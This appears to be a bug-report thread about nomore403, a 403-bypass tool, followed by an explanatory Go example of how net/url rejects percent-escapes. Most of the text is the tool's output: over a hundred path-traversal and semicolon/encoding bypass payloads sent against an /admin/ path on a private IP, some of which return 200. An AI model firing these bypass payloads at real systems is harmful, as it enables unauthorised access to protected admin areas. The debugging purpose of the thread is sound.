400 	  392 bytes http://172.16.67.124//../.;/../admin/
403 	  372 bytes http://172.16.67.124//../..//admin/
400 	  392 bytes http://172.16.67.124//..//../../admin/
404 	  372 bytes http://172.16.67.124//..//..;/admin/
400 	  392 bytes http://172.16.67.124//.././../admin/
400 	  392 bytes http://172.16.67.124//../;/admin/
400 	  392 bytes http://172.16.67.124//../../admin/
404 	  377 bytes http://172.16.67.124//..%2f..%2f..%2fadmin/
400 	  392 bytes http://172.16.67.124//../../../admin/
403 	  372 bytes http://172.16.67.124//..//admin/
404 	  372 bytes http://172.16.67.124//..;%2fadmin/
400 	  392 bytes http://172.16.67.124///../../admin/
403 	  372 bytes http://172.16.67.124//..;/../admin/
403 	  372 bytes http://172.16.67.124///admin/
404 	  369 bytes http://172.16.67.124///.admin/
404 	  370 bytes http://172.16.67.124///..admin/
403 	  372 bytes http://172.16.67.124///./admin/
404 	  380 bytes http://172.16.67.124//..;%2f..;%2f..;%2fadmin/
404 	  370 bytes http://172.16.67.124////..admin/
404 	  371 bytes http://172.16.67.124//.;//admin/
404 	  372 bytes http://172.16.67.124//..;/admin/
400 	  392 bytes http://172.16.67.124////../admin/
404 	  372 bytes http://172.16.67.124//..;//../admin/
404 	  372 bytes http://172.16.67.124////..;//admin/
404 	  371 bytes http://172.16.67.124////..;admin/
404 	  376 bytes http://172.16.67.124//..;/..;/admin/
200 	 3427 bytes http://172.16.67.124///?anythingadmin/
403 	  372 bytes http://172.16.67.124////..//admin/
404 	  370 bytes http://172.16.67.124//;//admin/
404 	  370 bytes http://172.16.67.124//;xadmin/
404 	  371 bytes http://172.16.67.124///.;/admin/
404 	  370 bytes http://172.16.67.124//x//../admin/
404 	  374 bytes http://172.16.67.124//x/..;//admin/
404 	  373 bytes http://172.16.67.124/;%09..;admin/
404 	  372 bytes http://172.16.67.124/;%2f..admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f%2e%2e%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/;%2f%2e%2eadmin/
404 	  377 bytes http://172.16.67.124/;%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 	  375 bytes http://172.16.67.124/;%2f%2f/../admin/
404 	  370 bytes http://172.16.67.124//x/../;/admin/
404 	  376 bytes http://172.16.67.124//..;%2f..;%2fadmin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f/../admin/
404 	  377 bytes http://172.16.67.124/;%2f..//..%2fadmin/
404 	  377 bytes http://172.16.67.124/;%2f../%2f..%2fadmin/
403 	  372 bytes http://172.16.67.124//./admin/
404 	  376 bytes http://172.16.67.124/;%2f..//;/admin/
404 	  370 bytes http://172.16.67.124//x/;/../admin/
404 	  376 bytes http://172.16.67.124//x/;/..;/admin/
403 	  372 bytes http://172.16.67.124/////admin/
404 	  378 bytes http://172.16.67.124/;%2f../;/;/;admin/
404 	  375 bytes http://172.16.67.124/;%2f/%2f../admin/
404 	  370 bytes http://172.16.67.124///;/admin/
403 	  372 bytes http://172.16.67.124//.//admin/
404 	  378 bytes http://172.16.67.124//..;/;/..;/admin/
404 	  372 bytes http://172.16.67.124//..;//admin/
404 	  376 bytes http://172.16.67.124//..;//..;/admin/
404 	  372 bytes http://172.16.67.124////..;/admin/
404 	  370 bytes http://172.16.67.124//;/admin/
404 	  372 bytes http://172.16.67.124/;%09..admin/
403 	  372 bytes http://172.16.67.124//x/../admin/
404 	  371 bytes http://172.16.67.124//;x/admin/
404 	  374 bytes http://172.16.67.124//x//..;/admin/
404 	  374 bytes http://172.16.67.124//x/..;/admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f/..%2fadmin/
404 	  374 bytes http://172.16.67.124/;%2f..%2f/admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f..%2f%2fadmin/
403 	  372 bytes http://172.16.67.124//x/..//admin/
404 	  377 bytes http://172.16.67.124/;%2f..//;/;admin/
404 	  376 bytes http://172.16.67.124//x/..;/;/admin/
404 	  375 bytes http://172.16.67.124/;%2f..///admin/
404 	  377 bytes http://172.16.67.124/;%2f../%2f../admin/
404 	  377 bytes http://172.16.67.124/;%2f..//../admin/
404 	  376 bytes http://172.16.67.124/;%2f..;///admin/
404 	  376 bytes http://172.16.67.124/;%2f../;//admin/
404 	  377 bytes http://172.16.67.124/;%2f../;/;/admin/
404 	  376 bytes http://172.16.67.124/;%2f..///;admin/
404 	  375 bytes http://172.16.67.124/;%2f//..%2fadmin/
404 	  370 bytes http://172.16.67.124/;%09admin/
404 	  371 bytes http://172.16.67.124/;%09;admin/
404 	  377 bytes http://172.16.67.124/;%2f/;/..;/admin/
404 	  376 bytes http://172.16.67.124/;%2f/;/../admin/
404 	  377 bytes http://172.16.67.124/;%2f..;//;/admin/
404 	  377 bytes http://172.16.67.124/;%2f..;/;//admin/
404 	  376 bytes http://172.16.67.124/;%2f//..;/admin/
404 	  375 bytes http://172.16.67.124/;%2f//../admin/
404 	  381 bytes http://172.16.67.124//.randomstringadmin/
404 	  371 bytes http://172.16.67.124///..;admin/
404 	  372 bytes http://172.16.67.124/;/%2e%2eadmin/
404 	  378 bytes http://172.16.67.124/;%2f;/;/..;/admin/
404 	  371 bytes http://172.16.67.124//.;/admin/
404 	  374 bytes http://172.16.67.124//..;/;/admin/
404 	  376 bytes http://172.16.67.124/;%2f;//../admin/
404 	  374 bytes http://172.16.67.124/;/%2e%2e%2f%2fadmin/
404 	  374 bytes http://172.16.67.124/;/%2e%2e%2f/admin/
404 	  372 bytes http://172.16.67.124/;/%2e.admin/
404 	  369 bytes http://172.16.67.124/;admin/
404 	  372 bytes http://172.16.67.124/;/.%2eadmin/
404 	  375 bytes http://172.16.67.124/;/%2f%2f../admin/
404 	  375 bytes http://172.16.67.124/;/%2f/../admin/
404 	  375 bytes http://172.16.67.124/;/%2f/..%2fadmin/
403 	  372 bytes http://172.16.67.124/;/%2e%2e/admin/
200 	 3427 bytes http://172.16.67.124/???admin/
403 	  372 bytes http://172.16.67.124/;/../.;/../admin/
403 	  372 bytes http://172.16.67.124/;/..//admin/
200 	 3427 bytes http://172.16.67.124/??admin/
200 	 3427 bytes http://172.16.67.124/?admin/
400 	  392 bytes http://172.16.67.124/;/.././../admin/
400 	  392 bytes http://172.16.67.124/;/../../admin/
404 	  375 bytes http://172.16.67.124/;/../%2f/admin/
404 	  371 bytes http://172.16.67.124/;x;admin/
404 	  375 bytes http://172.16.67.124/;/..%2f//admin/
403 	  372 bytes http://172.16.67.124/;/../admin/
403 	  372 bytes http://172.16.67.124/;/../..//admin/
404 	  371 bytes http://172.16.67.124/;x/admin/
404 	  370 bytes http://172.16.67.124/;xadmin/
404 	  376 bytes http://172.16.67.124/;/..%2f..%2fadmin/
404 	  374 bytes http://172.16.67.124/;/..%2f/admin/
404 	  377 bytes http://172.16.67.124/;foo=bar/admin/
404 	  370 bytes http://172.16.67.124/;///../admin/
404 	  370 bytes http://172.16.67.124/;///..//admin/
404 	  372 bytes http://172.16.67.124/;///..admin/
404 	  372 bytes http://172.16.67.124/;//..admin/
403 	  372 bytes http://172.16.67.124/;//../../admin/
404 	  377 bytes http://172.16.67.124/;/.%2e/%2e%2e/%2fadmin/
404 	  373 bytes http://172.16.67.124/;/.;.admin/
404 	  373 bytes http://172.16.67.124/;/..;admin/
404 	  370 bytes http://172.16.67.124/;/../;/admin/
403 	  372 bytes http://172.16.67.124/;/../;/../admin/
404 	  373 bytes http://172.16.67.124/;/..%2fadmin/
403 	  372 bytes http://172.16.67.124/;/..///admin/
403 	  372 bytes http://172.16.67.124/;/..//../admin/
404 	  375 bytes http://172.16.67.124/;/..//%2fadmin/
403 	  372 bytes http://172.16.67.124/;/..//%2e%2e/admin/
404 	  377 bytes http://172.16.67.124/;/..%2f%2f../admin/
404 	  372 bytes http://172.16.67.124/;/..admin/
404 	  375 bytes http://172.16.67.124/;//%2f../admin/
404 	  374 bytes http://172.16.67.124/\..\.\admin/

━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━
403 	  372 bytes HTTP/1.0
403 	  353 bytes HTTP/1.1
403 	  353 bytes HTTP/2

━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━
2024/03/19 01:59:49 parse "http://172.16.67.124admi%6E/": invalid URL escape "%6E"
 	    0 bytes http://172.16.67.124admi%6E/
2024/03/19 01:59:49 parse "http://172.16.67.124%61dmin/": invalid URL escape "%61"
 	    0 bytes http://172.16.67.124%61dmin/
2024/03/19 01:59:49 parse "http://172.16.67.124a%64min/": invalid URL escape "%64"
 	    0 bytes http://172.16.67.124a%64min/
2024/03/19 01:59:49 parse "http://172.16.67.124ad%6Din/": invalid URL escape "%6D"
 	    0 bytes http://172.16.67.124ad%6Din/
2024/03/19 01:59:49 parse "http://172.16.67.124adm%69n/": invalid URL escape "%69"
 	    0 bytes http://172.16.67.124adm%69n/
2024/03/19 01:59:49 Get "http://172.16.67.124admiN/": dial tcp: lookup 172.16.67.124admiN on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124admiN/
2024/03/19 01:59:49 Get "http://172.16.67.124admIn/": dial tcp: lookup 172.16.67.124admIn on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124admIn/
2024/03/19 01:59:49 Get "http://172.16.67.124aDmin/": dial tcp: lookup 172.16.67.124aDmin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124aDmin/
2024/03/19 01:59:49 Get "http://172.16.67.124Admin/": dial tcp: lookup 172.16.67.124Admin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124Admin/
2024/03/19 01:59:49 Get "http://172.16.67.124adMin/": dial tcp: lookup 172.16.67.124adMin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124adMin/

Thanks in advance!

invalid URL escape "%"

I am getting this when the program starts
CUSTOM PATHS

[####] CUSTOM PATHS [####]
2022/09/11 13:37:26 parse "https://REDACTED.DOMAIN/admin.php%": invalid URL escape "%"
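
What Go's `net/url` makes of the strings logged in the two reports above, as an added example (not nomore403's own code). The `classify` helper is hypothetical, and the third sample, with a `/` between host and suffix, is an assumption about the intended URL.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// classify explains what net/url makes of a target string: which component
// carried a rejected percent-escape, or how the string split when it parsed.
func classify(raw string) string {
	u, err := url.Parse(raw)
	if err == nil {
		return fmt.Sprintf("ok host=%s path=%s", u.Host, u.Path)
	}
	var esc url.EscapeError
	if !errors.As(err, &esc) {
		return "other: " + err.Error()
	}
	// The authority is whatever sits between "//" and the next "/".
	rest := raw
	if i := strings.Index(raw, "//"); i >= 0 {
		rest = raw[i+2:]
	}
	authority := strings.SplitN(rest, "/", 2)[0]
	// Escapes such as %6E are refused inside a host but decoded inside a path.
	if strings.Contains(authority, string(esc)) {
		return "host escape " + string(esc)
	}
	return "path escape " + string(esc)
}

func main() {
	// Constructed from the log lines quoted in the two reports above.
	samples := []string{
		"http://172.16.67.124admi%6E/",       // suffix glued to the host
		"http://172.16.67.124admiN/",         // parses, but the host is bogus
		"http://172.16.67.124/admi%6E/",      // assumed intent: "/" before suffix
		"https://REDACTED.DOMAIN/admin.php%", // bare "%" at the end of the path
	}
	for _, s := range samples {
		fmt.Printf("%-38s %s\n", s, classify(s))
	}
}
```

A literal percent sign in a path has to be written `%25` to pass this parser; with the separator in place, `%6E` decodes to `n`, so the request path is `/admin/`.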
